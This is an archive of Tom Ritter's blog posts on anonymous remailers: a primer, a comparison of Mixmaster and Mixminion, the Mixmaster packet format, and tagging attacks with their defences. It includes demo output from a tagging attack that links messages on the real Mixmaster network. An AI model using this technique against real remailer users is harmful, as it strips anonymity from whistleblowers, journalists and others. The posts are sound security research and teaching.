TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
Initialization Vector      0x0A0A0A0A 0x0A0A0A0A
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 0x01020304 0x05060708
                           (Fill to 328 Bytes..)

So after decryption, the third node will have a message digest that is half-valid and half-invalid. If the attacker recieves a message in that form, they are able to recognize it as a message they tagged in the first hop. They are still able to decrypt the Mix Payload because, crucially, we did not cause any corruption to the Triple DES key or Initialization Vector. It is also possible there was a legitimate corruption during transit, but lower layer checksums make that improbable.

If you'd like to follow this attack in greater detail, code demonstrating it is available on github. It makes heavy use of the unfinished Python Mixmaster implementation Mixfaster. Here's what it looks like when you run it (output minified a tad):

$ ./demo.py
Client sends message with a Path of Node1,Node2,Node3
  by pure luck (or unluck) Nodes 1 and 3 are attacker-controlled
======================================================================
Received Message on Node 1, processing...
Message recieved by Node 1, decrypted, and decoded:
        Packet Header ---------------------------
         Public Key Id: 72f00ecf4f4e3af64d19772d4dd7d620
         PacketType: IntermediateHop (0)
         Timestamp:  Sun Oct 21 20:00:00 2012
         Remailer Address: node2@example.com
        ...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Performing Tagging Attack
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Sending Message on to Node 2...
======================================================================
Received Message on Node 2, processing...
Message recieved by Node 2, decrypted, and decoded:
        Packet Header ---------------------------
         Public Key Id: 24a17d807994cffbe65fdc6ce13d3562
         PacketType: IntermediateHop (0)
         Timestamp:  Tue Oct 23 20:00:00 2012
         Remailer Address: node3@example.com
        ...
Sending Message on to Node 3...
======================================================================
Received Message on Node 3, processing...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Caught a Decoding Exception! Continuing Anyway...
Actual Digest   b496224032ec197aaa27ba3632e6f127
Included Digest b496224032ec197a925d5f463ffa7da8
                |______________||______________|
                     Matches       Corrupted
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Message recieved by Node 3, decrypted, and decoded:
        Packet Header ---------------------------
         Public Key Id: f3372c7effb5887858460b7ed2faab91
         PacketType: FinalHop (1)
         Timestamp:  Sun Oct 21 20:00:00 2012
        Packet Body -----------------------------
         Data Length       : 229
         Destination Fields: 1
            john@nytimes.com
         Header Fields     : 1
            Subject: Confidential Information
         User Data Type    : Plain (3)
         User Data:

           This is a sample mixmaster message demonstrating tagging attacks.

Conclusion

The flaw in Mixmaster is that there is no integrity protection of the Mix Headers or Payload as they cross nodes. A node is able to verify that the Mix Header it processes has not been altered (at least up to the Padding) - but cannot make the same statement about the other Mix Headers or the Payload. So we modify a Header intended for Node 3 as the message leaves Node 1, Node 2 will pass it on (unaware it's been tampered), and Node 3 recognizes the tampering.

This blog post is licensed under Creative Commons Attribution 3.0 United States License and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project here.

Packet Formats

05 Jan 2013 23:47:00 EST

This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.

While most of ritter.vg will function without javascript, this blog post is an exception.

A remailer's packet format is the format of the data it passes to the next remailer. The packet format is somewhat independent of the remailer transport protocol itself - just as a letter is independent of how you recieve it. A courier can hand-deliver a letter to you, it can be dropped in your mailbox by a stranger, or the Postal Service can deliver it. But once you've actually recieved it, you can open it, read it, and take action based on it.

Although packet formats are independent of remailer transport protocol, most remailers do not process more than one type of format. While I initially wanted to create a single blog post covering all the major packet formats - that proved to be extremely long, so it's going to be split up across a couple blog posts. This first one will cover the Mixmaster packet format, as used in the Mixmaster remailer network.

Mixmaster Format

The mixmaster packet format is detailed in mixmaster-spec.txt and can be described as 20 Mix Headers followed by a Mix Paylod. The first Mix Header is encrypted to your public key - you can decrypt it and learn where to send the rest of the data. If the message is a Final Hop, you will be able to decrypt the Payload, and send it to the final destination.

If the message is not a Final Hop - if it is an Intermediate Hop - you will find the address of the next remailer in the chain. Before sending it on, you will decrypt all subsequent Headers (numbers 2 - 20) and the Payload - but you will not find any meaningfull data, as they are encrypted multiple times, in an onion, to keys you don't know. The following animated examples should demonstrate the layering:

Mixmaster Final Message, As Seen by the Final Hop

Mixmaster Final Message, As Seen by the Final HopMix HeadersMix Header 1Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678     
                           Decrypts To: 0xDABCDABC 0xDABCDABC 0xDABCDABC
Initialization Vector      0x09090909 0x09090909
Encrypted Header Part
Packet ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45 
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
Initialization Vector      0x0A0A0A0A 0x0A0A0A0A
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 (Fill to 328 Bytes..)
Mix Headers 2-20Random Data (512 bytes)    0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           ....
Mix PayloadLength                     0x12 0x10 0x00 0x00
# of Destination Fields    0x01
Destination Fields         john@example.com 0x00 0x00 0x00  (Padded to 80 bytes)
# of Header Fields         0x01
Header Fields              Subject: Event Details 0x00 0x00 (Padded to 80 bytes)
User Data Section          
Message                    Hey John, 
                           
                           We're planning on started at 10 PM, so if you could
                           show up at 9:00 to help set up, we'd appreciate it.
                           
                           Thanks,
                           Staff
                           0x00 0x00 0x00 0x00 0x00 (padded to 10236 bytes)

Mixmaster Intermediate Message, As Seen by an Intermediate Hop

Mixmaster Final Message, As Seen by the Final Hop
Mix Headers
Mix Header 1
Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678     
                           Decrypts To: 0xDABCDABC 0xDABCDABC 0xDABCDABC
Initialization Vector      0x09090909 0x09090909
Encrypted Header Part
Packet ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45 
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x02
Packet Information
Initialization Vector1     0x0A0A0A0A 0x0A0A0A0A
Initialization Vector2     0x0B0A0A0A 0x0B0A0A0A
Initialization Vector3     0x0C0A0A0A 0x0C0A0A0A
Initialization Vector4     0x0D0A0A0A 0x0D0A0A0A
Initialization Vector5     0x0E0A0A0A 0x0E0A0A0A
Initialization Vector6     0x0F0A0A0A 0x0F0A0A0A
Initialization Vector7     0x1A0A0A0A 0x1A0A0A0A
Initialization Vector8     0x1B0A0A0A 0x1B0A0A0A
Initialization Vector9     0x1C0A0A0A 0x1C0A0A0A
Initialization Vector10    0x1D0A0A0A 0x1D0A0A0A
Initialization Vector11    0x1F0A0A0A 0x1F0A0A0A
Initialization Vector12    0x2A0A0A0A 0x2A0A0A0A
Initialization Vector13    0x2B0A0A0A 0x2B0A0A0A
Initialization Vector14    0x2C0A0A0A 0x2C0A0A0A
Initialization Vector15    0x2D0A0A0A 0x2D0A0A0A
Initialization Vector16    0x2E0A0A0A 0x2E0A0A0A
Initialization Vector17    0x2F0A0A0A 0x2F0A0A0A
Initialization Vector18    0x3A0A0A0A 0x3A0A0A0A
Initialization Vector19    0x3B0A0A0A 0x3B0A0A0A
Remailer Address           exitremailer@exam.com 0x00 0x00 (Padded to 80 bytes)
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 (Fill to 328 Bytes..)


Mix Header 2
Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678     
Initialization Vector      0x09090909 0x09090909
Encrypted Header PartIndecipherable Data


Mix Headers 3-20Indecipherable Data        0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           ....

Mix PayloadIndecipherable Data

Transport

The above is the binary format of the protocol. The mixmaster packets are then encoded as follows before transit:

::
Remailer-Type: Mixmaster [version number]

-----BEGIN REMAILER MESSAGE-----
[packet length ]
[message digest]
[encoded packet]
-----END REMAILER MESSAGE-----

Because the Mix Payload is padded to a constant size, and there are always 20 Mix Headers, a Mix Message is a constant size, and the packet length field is always 20480. The Message Digest is computed over the encrypted, binary representation of the Mix Headers+Payload and then base64-ed. Finally, the binary headers+payload themselves are encoded in base64 and broken into lines of 40 characters.

Notes

Some other notes about the Mixmaster Packet Format, tersely:

The Mix Payload packet is a constant 10236 bytes (plus 4 bytes length) - any message larger than that must be split into message chunks (which will be talked more about in another blog post.) But any message smaller than that is still padded to that size.
Obviously, there is only room for 20 Mix Headers, so the maximum hop length of a Mixmaster message is 20 hops.
The format conceals the lenth of the path from each intermediate hop - if you're not the final hop, you don't know how many more hops there are.
The raw packet format, shown above, has many distinct markers, making it easy to reliably detect it in transit. (This is especially bad for Mixmaster, do you know why? Hint: check out the second blog post.)
The algorithm and key lengths are hardcoded into the specification, with no room for alternation. Thus we are stuck with
- RSA 1024 with PKCS #1 v1.5 Padding
- EDE Triple DES in CBC Mode
- MD5 as Message Digest Algorithm
Replay prevention is often built into the packet format, at least partly. In the Mixmaster specification, a server keeps track of all Packet IDs seen so far, and if it sees an identical one, will discard the message as a replay. Mixmaster must expire old packet ids eventually, and so a message can be replayed if the server has expired the packet id. We'll talk more about replay attacks in a future blog post also.
The format is vulnerable to Tagging Attacks, which I'll go over in more detail with an example in a future blog post.

This blog post is licensed under Creative Commons Attribution 3.0 United States License and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project here.

Previous Step
Close
Next Step

Tagging Attacks

05 Jan 2013 23:46:00 EST

This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.

A Tagging Attack is a class of attack that allows an adversary to recognize traffic at a later date by modifying it. It may be best illustrated by an example. Consider a simple example, where clients communicate with a server using AES in CTR mode, with a pre-shared key for simplicity.

An attacker observes the N clients connected to the server, and sees the outgoing connections to websites, but cannot be certain which client is requesting which resource. The attacker can use a tagging attack to be certain what resource a client is requesting. For the purposes of this illustration we will ignore the passive length-based correlation available to the attacker, and focus on the tagging attack. CTR decryption works by XORing the ciphertext with the keystream to produce the plaintext:

An attacker will modify the ciphertext slightly. Specifically, they will XOR the first byte of the ciphertext with 0x20. Why 0x20? Because this is a special value that will allow every party involved to continue as normal, while allowing the attacker to detect the tag. Let's look at it in detail. Consider the following Plaintext, Keystream, and Ciphertext.

HTTP:       G  E  T     /     H  T  T  P  /  1  .  1  \n H  o  s  t  :  ...
Plaintext:  47 45 54 20 2f 20 48 54 54 50 2f 31 2e 31 0A 48 6f 73 74 3a ...

Keystream:  c3 91 f0 c3 74 90 cf dd 91 24 5c 65 1d 2c bd 79 1b 99 48 c0 ...
      XOR:  -----------------------------------------------------------
Ciphertext: 84 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA ...

The attacker sees this ciphertext as it leaves the client, and will modify the first byte of it.

Ciphertext: 84 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA ...
Attacker:   20 
       XOR: -----------------------------------------------------------
Ciphertext':A4 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA ...

Now the server will recieve it and produce the same keystream, decrypt it, and forward it on to the appropriate server.

Ciphertext':A4 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA ...
Keystream:  c3 91 f0 c3 74 90 cf dd 91 24 5c 65 1d 2c bd 79 1b 99 48 c0 ...
       XOR: -----------------------------------------------------------
Plaintext:  67 45 54 20 2f 20 48 54 54 50 2f 31 2e 31 0A 48 6f 73 74 3a ...

HTTP:       g  E  T     /     H  T  T  P  /  1  .  1  \n H  o  s  t  :  ...

But observe what the attacker has done! The attacker has changed the uppercase GET to gET. No client will send a HTTP request in that form, but no server will reject it. The attacker then knows that whatever request comes out in that form was from the client they modified going in. A cool thing about this value is that it will also change POST to pOST, so it works on both requests.

Applicability To Cryptographic Primatives

Tagging attacks are easiest when the underlying cryptographic primative is homomorphic with regards to an operation. That's a fancy way of saying the ciphertext may be modified by an operation, and the modification affects the plaintext in the same way. Homomorphic encryption is a bit of a buzzword, so hearing that RSA is homomorphic may come as a surprise - but it's true. RSA, and a number of other primitives, are partially homomorphic. Only bare RSA is homomorphic, padded RSA is not. For this and many more reasons - never use bare RSA.

And as demonstrated earlier, block cipher modes may also be homomorphic. We demonstrated a tagging attack on Counter Mode (CTR), it is similarly trivial in Output Feedback Mode (OFB). It is also possible in Cipher Block Chaining (CBC) and Cipher Feedback Mode (CFB). Other block cipher modes may be similarly vulnerable.

However, a tagging attack does not require homomorphism. Homomorphism merely makes the attack easier to weaponize! It's also entirely possible to mangle ciphertext to cause an error, and by observing the response to the error, you can perfom the correlation. In the future, we'll show a practical tagging attack on a real, deployed, anonymity system.

Commonalities Between Passive Correlation Attacks

The goal of a tagging attack is to recognize traffic after it traverses an uncontrolled node. However a tagging attack is not the only way to accomplish this goal. In fact, a passive correlation attack may be even easier. Consider a scenario where a number of clients are connected to a Facebook chat server, and they are periodically sending and recieving chat messages:

I want to know which of these connected clients is a particular user on facebook. I have two easy ways to do this. First, I can simply watch which clients recieve messages when I send messages to the user. I can't see inside their traffic, but I can see the size of the traffic, so I know when they recieve a message. In this case, I've narrowed it down to Alice and David. I can keep doing this until I've figured it out conclusively.

However, if clients are sending and recieving messages constantly, this may be tricky to achieve accurately with a few number of messages. I can get much higher accuracy in a single message... by sending a huge message. Most chats are small, a few sentences. By sending a huge message, up to the maximum limit, I can easily see which client recieves a correspondingly huge message:

This correlation attack does not require an adversary to modify any traffic, so it doesn't fit the standard definition of a 'tagging attack'. This type of correlation, based on packet sizes and timings, are particurally damaging against low latency mix networks like Tor. However, with enough data, they can also work against high latency mix networks like remailers. We're going to talk a lot more about these passive correlation attacks in the future.

Preventing Tagging Attacks

The goal of a tagging attack is to recognize traffic after it traverses an uncontrolled node. Therefore to prevent the attack from succeeding, the uncontrolled node must recognize that the traffic has been tagged, and drop it. The key goal is to provide integrity of the entirity of the message. There are a few different techniques to do so. For example, you can compute a MAC of the ciphertext and transmit that along with the message:

Message:    A4 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA 73 C8 3B A5 9C 7F 1D
            |________________________________________________| |___________________________|
                                Ciphertext                           MAC of Ciphertext

If the whole of the message is protected with a MAC, and the MAC is computed over the ciphertext, we can recognize any modification. An attacker must modify either the ciphertext or the MAC, and if either is modified the MAC will not verify correctly. If the MAC doesn't verify correctly, the node discards it.

Another technique to provide integrity is to use an authenticated encryption mode. With a correctly implemented authenticated encryption mode, a modification in the ciphertext will result in an exception or error state during decryption, and the node will not have plaintext to use. Another primitive, which is more complicated, is to encrypt the entire message in a single block, using special constructions that allow for large block sizes such as BEAR or LIONESS. If the entire message is a single block, any bit that is flipped will cause the entire block to decrypt to something completely unrecognizable by the intermediate node (hopefully). Using a large block size is generally a very tricky thing, and should not be done without a very deep background in cryptography.

Tagging Attacks have been written about before, but generally in academic papers - for more detail, we recommend "One cell is enough to break Tor's anonymity" on the Tor Project blog, and the references it included. However, the security trade-offs made by Tor in relation to tagging attacks should not be accepted as carte-blanche to ignore the attack in new systems. For example, because Tor is a low-latency system, and remailers are a high-latency system, tagging attacks may provide higher confidence levels compared to pure correlation-based attacks.

This blog post is licensed under Creative Commons Attribution 3.0 United States License and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project here.

Remailers We've Got

05 Jan 2013 23:45:00 EST

This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.

There are two main implemented remailer networks in operation: Mixmaster and Mixminion. Mixmaster was written in the early 90s by Lance Cottrell, and was maintained for a number of years by Len Sassaman. Mixminion was written in the early 2000s by Nick Mathewson, based on a research paper he wrote with George Danezis and Roger Dingledine. A third, Cypherpunk Remailers, exists as well, although is mostly supported as a compatibility layer in the Mixmaster software. Although conceptually they all do the same thing - allow the sending of anonymous emails - there are a number of design and implementation differences.

In Mixmaster, when you compose your russian-doll nested messages to each remailer, you will send the message to the first node using normal email - SMTP. Each node will subsequently send it to each following node using an email message over SMTP.

There disadvantages of this.

The SMTP conversation between you and the first node is not encrypted. An attacker observing you would know you are sending messages to a remailer, even if they did not know remailers existed, or had a list of them. It's important to note that the message is still encrypted, but the transport of the encrypted message is not itself encrypted.
The SMTP conversation between each node is not encrypted. This allows an attacker to observe the encrypted messages sent between. The attacker could store the encrypted messages for later decryption if they compromise the server's private key.Again, the message is still encrypted, but the transport of the encrypted message is not itself encrypted. There are some technicalitys with StartTLS and DHE ciphersuites, but these should not be relied on.
Each Mixmaster node must run an email server. While running a webserver such as Apache or Nginx is very common today, and there are a lot of guides and best practices around doing so - running a mailserver today is more esoteric. The guides are less common and more out of date - it is not a common skill.

However, in Mixminion, when you compose your nested message, you will send the message to the first node using a binary protocol inside a SSL connection. That SSL connection uses Ephemeral Encryption - which provides Perfect Forward Secrecy (PFS). PFS means that if an attacker compromised the server's SSL certificate - they would not be able to decrypt that conversation. And, if an attacker breaks that conversation - they cannot read any other conversation. This is a very nice and robust property to provide, and by using SSL as a transport mechanism - we get it essentially for free, without having to write any additional code.

The advantages of Mixminion's approach compared to Mixmaster's:

The conversation between you and the first node is encrypted using SSL. Although an attacker who had a list of all remailer nodes would know you were speaking to one, an attacker who did not would see a normal SSL connection, extremely common on the web. With additional development, it would be possible to deploy 'bridge' Mixminion nodes, similar to Tor bridges, that an adversary was unable to enumerate.
The conversation between each node is encrypted with SSL using an ephemeral handshake. An attacker who observed the conversation can only know they are transmitting remailer messages if they know the computers are remailers a priori. Because the conversation is encrypted ephemerally, an attacker cannot coerce an operator to decrypt a traffic intercept later.
Only the exit Mixminion node must run an email server. Because the nodes pass messages between themselves using a binary protocol inside of SSL, and not via email messages, the only node that must run an email server is the final node when the message exits the remailer network and enters normal email. While some Mimixion nodes must run email servers, many do not need to.

Another major difference between Mixmaster and Mixminion is that Mixmaster is one-way. You can send an email anonymously to an individual, but if you want them to be able to reply, you would have to give them a reply address. Even if you choose a free email service and lie to them about your real name - this can still de-anonymize you, for example through a subpoena to the email provider. Mixminion however allows replies through what are called 'Single Use Reply Blocks' or SURBs. When I receive a message with a SURB, I can reply to the sender without know who the sender is. We'll talk more about SURBs and reply-block based designs later also.

There are a number of other differences between Mixmaster and Mixminion, including directory services, exit policies, dummy traffic. And there are a number of other topics and developments in anonymous email including packet formats (like Sphinx) and nym-based reply methods (like Pynchon Gate). We'll be covering more about these topics in the future.

Finally, before signing off, it's important to note that there are practical issues with both Mixmaster and Mixminion today. Neither one of these should be relied on for strong anonymity. Mixmaster, for example, makes use of 1024-bit RSA keys; and Mixminion has not been actively developed for years.

This blog post is licensed under Creative Commons Attribution 3.0 United States License and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project here.

What is a Remailer?

05 Jan 2013 23:44:00 EST

This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.

A remailer is slang for a system that allows you to send anonymous email to a recipient. It re-mails messages for you. There are a lot of reasons why people would want to send anonymous emails.

Researchers and Survey Participants, who don't want to expose their opinions on sensitive topics like religion or politics
Whistleblowers, who want to report illegal activity of a coworker, government or company - but can't risk losing their job or being prosecuted
Journalists, who want to correspond with a source without exposing the source, or being tracked down themselves.
Law Enforcement, who want to communicate with confidential sources or undercover agents without risking their operational security
Activists, protesting against repressive regimes like the ones we've seen in the Middle East
Consumers, who want to send feedback on a product or service
Individuals who don't trust their Internet Service Provider or Network Admin

In a series of blog posts, we're going to look at the theory and implementation of different remailing systems. We'll assume you're familiar with some basics of cryptography - symmetric (secret-key) and asymmetric (public key) cryptography for the most part - and with the general idea of how Tor works. If you don't know these things, you'll probably be able to follow along well enough, but may miss some of the comparisons.

From The Ground Up

If our goal is to send anonymous email, what is the simplest way we can accomplish this? How about we just create an Open Relay that will not forward identifying information? It will recieve a connection, process the SMTP message, and send it on to the recipient, leaving out any of the sender's information.

While this system does deliver mail - there's a number of problems that can compromise your anonymity. For example, if you're being watched by an attacker, they can see the email you're sending! SMTP goes over plaintext by default. Clearly the solution is to encrypt the message so an attacker watching you cannot see it. This could be done with TLS inside the SMTP conversation or via an out-of-band system such as PGP.

This gains you some confidentiality, but there are still a number of issues. Now, let us assume the attacker was watching the relay. They would see the relay sending a message (and what the message was, and to whom) right after you connected to them. They are able to correlate that message to you in nearly all situations. To mitigate this correlation attack, the relay needs to hang onto a message for a little bit before it actually sends the message on. If it collects a number of messages in a pool, and then flushes the pool, an attacker has a harder time figuring out who was sending a message to who. If they watch the relay, they will know Alice, Bob, Charlie, and Dave sent messages M, N, O, and P - but not which person sent which message.There are attacks on the pooling we presented, but we'll leave those to another blog post.

This system still has several open questions. For example, how did you learn about this relay, and how did you learn its public key? This authentication step is incredibly difficult - and the general approach is to create some central directory service - that's the technique used by SSL on the Internet, DNSSEC, and even the Tor Project. There are advantages and disadvantages of this: obviously a directory service is a centralized point of failure or censorship. However if a central directory service is not present, attackers can perform more successfull correlation attacks by considering who knows about what relays. Having a central directory service ensures all clients know about all relays.

So at this point our client will connect to a directory, get the list of all relays, and choose one at random. (If they chose the same one all the time, correlation would be much easier.) The client will connect to the relay, send their message, and the relay will hang onto it for a bit, collecting more messages, before forwarding it on. But consider this - since you're picking a relay at random - it's possible the relay itself may be run by an adversary! If anyone can run a relay, so can your adversary. Eventually you'll probably forward a message through that relay, and they can inspect the message and see who is sending it. To overcome the relay itself being run by the adversary, we need to perform onion routing.

Onion routing is when you deliver an encrypted message to a node, who decrypts it and finds an encrypted package for another node. They can't decrypt this package, so all they can do is pass it to that next node - who decrypts it, and finds yet another encrypted package. All the way down the line until the last node finds the actual message, and delivers it. By the time the package reaches the last node - the last node doesn't know who the message came from! And the first node doesn't know who the package is being delivered to or what it says.

While there are some tweaks in the actual implementations - which we will get to in future blog posts - this is basically how remailers work. Let's look at it in-depth.

The System Completed

When you want to send an email, you first contact some form of directory service that tells you about the existing remailer nodes in the network. You get the nodes, their public keys, and some statistics about their past reliability. Because the directory service is telling you about the nodes and their keys - it's important that this service is trusted. It'd be possible for a malicious directory service to tell you only about malicious nodes. We'll talk more about Directory Servers and attacks on them later.

After you've gotten the list of remailer nodes from the directory service, you choose a path through them. The path can (theoretically) be any length that you like, and you choose the nodes at random - although you usually take into account their reliability. This doesn't have to be done by the user, and is usually done automatically by the client software. One of the many subtleties of maintaining anonymity is choosing a path in the same manner as everyone else choosing a path - if one implementation chooses 3 hops, and another 5 hops - this information can be used by an adversary.

After you've chosen your path through the network, you take the email you want to send, and encrypt it in a package to each remailer - like Russian Dolls - and send it off through the network.

By encrypting it successively to each hop in your path, you ensure that each node knows the least possible about who you are, who you're e-mailing, and the contents of the message. By the time the message reaches the last hop, the last hop's administrator doesn't know who sent the message. They even don't know who would know who sent the message.

Who	Who they see talking	What they don't know
Network Observer between You & First Hop	You -> First Hop	Second & Third hops, Recipient, Message
First Hop	You -> Second Hop	Third hop, Recipient, Message
Network Observer between First & Second Hops	First Hop -> Second Hop	Sender (You), Third hop, Recipient, Message
Second Hop	First Hop -> Third Hop	Sender (You), Recipient, Message
Network Observer between Second & Third Hops	Second Hop -> Third Hop	Sender (You), First Hop, Recipient, Message
Third Hop	Second Hop -> Recipient	Sender (You), First Hop
Network Observer between Third Hop & Recipient	Third Hop -> Recipient	Sender (You), First & Second Hops
Recipient	Third Hop -> Them	Sender (You), First & Second Hops

In Comparison to Tor

If you're familiar with Tor, you may be thinking that this is just like it. And while it does look very similar to Tor, there are a few major differences in the details.

High Latency and Pooling

Latency is a measure of time delay experienced in a system. If you run ping 127.0.0.1 you'll get a response back immediately - there was no latency. But if you run ping 8.8.8.8 you will see some (probably small) number of milliseconds elapse when getting a response. That's latency. A 'Low Latency' network means as soon as a node receives a packet, it sends it out. A 'High Latency' network means a node will hold onto a message for some amount of time before sending it out.

Traffic Analysis is a huge part of network design. If an attacker is watching the network (and we generally assume they are) - how much information do they gain by watching packet paths, sizes, and times, and how easy is it? If you see a network flow from Alice to Bob, and Bob to Charlie - those flows will probably be matchable. With regard to defending against Traffic Analysis, High Latency is preferable - being able to hold onto a packet for any length of time before sending it on gives you a lot more options.

Tor is a 'Low Latency' network - it has no choice because it's infeasible to browse the Internet with minute-long (or longer) delays during page loads. However, email can have delays - if an email doesn't arrive for 30 minutes or an hour, it's generally not a problem. So Remailers can afford to be a High Latency network. They will accumulate a number of messages in a pool, and then when the pool is a certain size, will send the messages out. There are multiple algorithms for pooling, and we'll go into more detail about them and pool attacks later.

Padding

If a network did not pad messages, and you send a packet of length 1337, each node will receive and send a packet of 1337 all the way to the final destination. This helps traffic analysis attacks, because someone watching a node can see the sizes of the packets received and sent, and it makes it easier to track the traffic across nodes - even when multiple people are using the nodes.

Tor pads messages into 512-byte cells. If you want to send 1337 bytes of data, it will (probably) be sent in 3 separate cells. Remailers pad all messages also, but to a larger size (on the order of 10 or 28 KB). We'll go into more detail about padding, and what happens when a message is larger than the chosen pad size - but the point is padding makes it more difficult to correlate messages, and when combined with pooling helps defend against traffic analysis.

Conclusion

We hope this is an understandable introduction to remailers. In our next post we'll look at two existing remailer networks and some of the subtleties of their designs. We hope to produce a series of remailer blog posts, eventually going into detail about topics such as pooling algorithms and attacks, directory services attacks, mix packet formats, traffic analysis, padding sizes, and other topics that must be considered when designing remailer networks.

This blog post is licensed under Creative Commons Attribution 3.0 United States License and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project here.

Remailer Blog Posts

07 Jan 2013 21:52 EST

I don't write a lot, so when I do write for another blog (usualy an employer's) I tend to go to pains to copy the blog post here (with a credit). Today I've published five technical blog posts for another blog, but I'm not reposting them - I'm just pointing at them. They're hosted on the same machine as this one, just on a seperate domain, so I'm not worried about losing them.

Crypto.is kicks off its blog with a series of articles about remailers! This is the first several installments in what is intended to be a series on how remailers work, the theory behind them, and many of the choices that must be considered. Some of the topics we intended to dive deeply into in the future is how to have a directory of remailer nodes, how to handle messages that overflow the packet size, more details on Mixminion, as-yet-unimplemented Academic Papers (like Pynchon Gate and Sphinx), and more! Check out posts One, Two, Three, Four, and Five. The comments section should work, so please do leave comments if you have questions, insights, or corrections!

These blog posts are:

5	A Tagging Attack on Mixmaster	05 Jan 2013 23:48:00 EST by Tom Ritter
4	Packet Formats 1 of 3(?)	05 Jan 2013 23:47:00 EST by Tom Ritter
3	Tagging Attacks	05 Jan 2013 23:46:00 EST by Tom Ritter
2	Remailers We've Got	05 Jan 2013 23:45:00 EST by Tom Ritter
1	What is a Remailer?	05 Jan 2013 23:44:00 EST by Tom Ritter

I put a lot of effort into them, and it goes into (what I think) are fairly complicated topics like tagging attacks, so I hope you like them!

An Attack on SSL Client Certificates

07 Jan 2013 21:40 EST

SSL is designed to provide Authenticity, Confidentiality, and Integrity. If an attacker is performing a Man in the Middle attack, they can slow down or close a SSL connection - but they cannot modify or learn the contents. The attacker should also not be able to impersonate the server - that's the Authenticity part. But Authenticity relies on Certificate Authorities - the attacker cannot impersonate a site because a CA will verify the applicant controls the domain applied for. But in the past couple years, we've seen some cracks there that have allowed advanced attackers to impersonate arbitrary and high-profile sites on the Internet. And of course, non-validating clients or installing a rogue CA into your trust store would make this easy too.

